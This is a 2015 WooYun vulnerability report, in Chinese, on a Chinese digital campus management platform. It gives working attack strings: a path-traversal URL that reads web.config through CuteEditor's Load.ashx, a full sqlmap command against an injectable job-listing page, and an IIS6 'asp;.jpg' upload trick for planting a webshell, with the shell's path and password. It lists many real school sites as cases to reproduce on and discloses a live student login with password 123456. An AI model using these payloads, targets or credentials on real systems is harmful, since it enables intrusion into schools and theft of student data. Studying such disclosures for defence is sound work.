当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100796

漏洞标题:某数字化校园平台管理系统通用型漏洞打包

相关厂商:武汉英福软件有限公司

漏洞作者: 路人甲

提交时间:2015-03-12 10:59

修复时间:2015-06-15 09:48

公开时间:2015-06-15 09:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向第三方安全合作伙伴开放
2015-05-11: 细节向核心白帽子及相关领域专家公开
2015-05-21: 细节向普通白帽子公开
2015-05-31: 细节向实习白帽子公开
2015-06-15: 细节向公众公开

简要描述:

1#任意文件下载
2#SQL注入(某子系统)
3#目录浏览(部分站点)
4#文件上传导致命令执行(iis6解析漏洞)
5#部分子系统接口可获取到用户帐号姓名等信息
6#系统用户弱口令

详细说明:

目标系统:英福金银花ETMV9数字化校园平台
武汉英福软件有限公司——业内知名的高技术研究与经营企业,致力于大型专业管理软件、教务行业解决方案、数字化校园平台、仿真软件、机电技术等高科技产品的研究开发、集成于应用。
百度关键字:

技术支持:武汉英福软件有限公司 Tel:027-87808981、87211102


1#任意文件下载
该校园平台使用了第三方编辑器CuteEditor,虽然删除了存在任意文件上传的漏洞文件uploader.ashx(具体利用可参考白帽子zcgonvh的 WooYun: CuteEditor脚本文件上传漏洞 ),与目录遍历漏洞文件browse_Img.asp,但是却忽略了任意文件包含漏洞文件Load.ashx

CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config


以郑州卫校数字化校园平台http://218.29.94.8/etmdcp/为例
http://218.29.94.8/etmdcp/
目录浏览让问题更直观(源码包、数据库泄漏)

QQ截图20150311211503.png


该平台下有多个子系统,不一定所有的子系统都会被使用,没有使用的系统因为配置关系访问漏洞页面会报错

QQ截图20150311211834.png


QQ截图20150311211851.png


QQ截图20150311211912.png


QQ截图20150311211931.png


简单来说,平台各子系统就是把一套系统基础架构不动,增删一些其它文件成为另一套系统

QQ截图20150311212410.png


2#SQL注入(子系统:就业服务管理系统通杀)
参数:postkey、post、place;
只要漏洞页面VJ/Website/PublishJobinfor.aspx能够打开,不报运行时错误,不管有无数据均能注入
python SQLMap/SQLMap.py -u "http://218.29.94.8/etmdcp/VJ/Website/PublishJobinfor.aspx?postkey=1&post=&place=&guid=" --dbs

QQ截图20150311213439.png


以下案例可供复现注入
http://www.tlsz.com.cn:8090/vj//Website/PublishJobinfor.aspx
http://zsjy.ayit.edu.cn/vj/Website/PublishJobinfor.aspx
http://job.zzptc.com/Website/PublishJobinfor.aspx
http://emp.bcu.edu.cn/Website/PublishJobinfor.aspx
以下案例供复现任意文件下载:
http://www.gzgyjx.com/ETMDCP//CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
http://gd.whut.edu.cn/etm/etmdcp//CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
http://gemis.syphu.edu.cn/ETMDCP//CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
http://60.160.77.30/jiaowu//CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
http://mail.wx-wx.com.cn//CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
目录浏览:(部分站点),通过目录浏览,可得到webservice地址
http://1.28.76.37:6664/etm/
http://www.tlsz.com.cn:8090/vj/CuteSoft_Client/
http://218.29.94.8/etmdcp
严格来说,还有一个子系统OA,存在fck编辑器上传漏洞(结合iis6解析)
http://218.29.94.8/etmdcp/OA/fckeditor/_samples/default.html

QQ截图20150311214436.png

漏洞证明:

5#通过接口获取学生用户帐号(只是一个最简单的例子,部分接口可增删改数据)
该接口不是所有子系统都存在
http://218.29.94.8/etmdcp/etmdcp/webservice/Ajax_Service.asmx

QQ截图20150311215130.png


QQ截图20150311215457.png


6#系统用户弱口令
口令大部分为123456或者就是与登录帐号相同
4#文件上传导致命令执行(iis6解析漏洞)
以就业服务管理系统为例
利用弱口令登录
http://job.zzptc.com/
学生帐号:20081020
密码:123456

QQ截图20150311215858.png


在生源信息处,存在一个照片上传。上传后的照片是以20081020_test.jpg学号+文件名的形式保存的,所以,可以通过抓包,利用服务器iis的解析漏洞,达到shell的目的。

QQ截图20150311220112.png


QQ截图20150311220635.png


QQ截图20150311220736.png


http://job.zzptc.com/DownFile/GraduatePhoto/20081020_wooyun.asp;.jpg
密码g
一句话不大好使,但是小马可以正常工作,通过小马将一句话或大马传到其它目录中

QQ截图20150311220924.png

修复方案:

编辑器打补丁
针对注入过滤参数
做好上传文件的后缀名过滤
等等

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-03-17 09:47

厂商回复:

暂未能建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无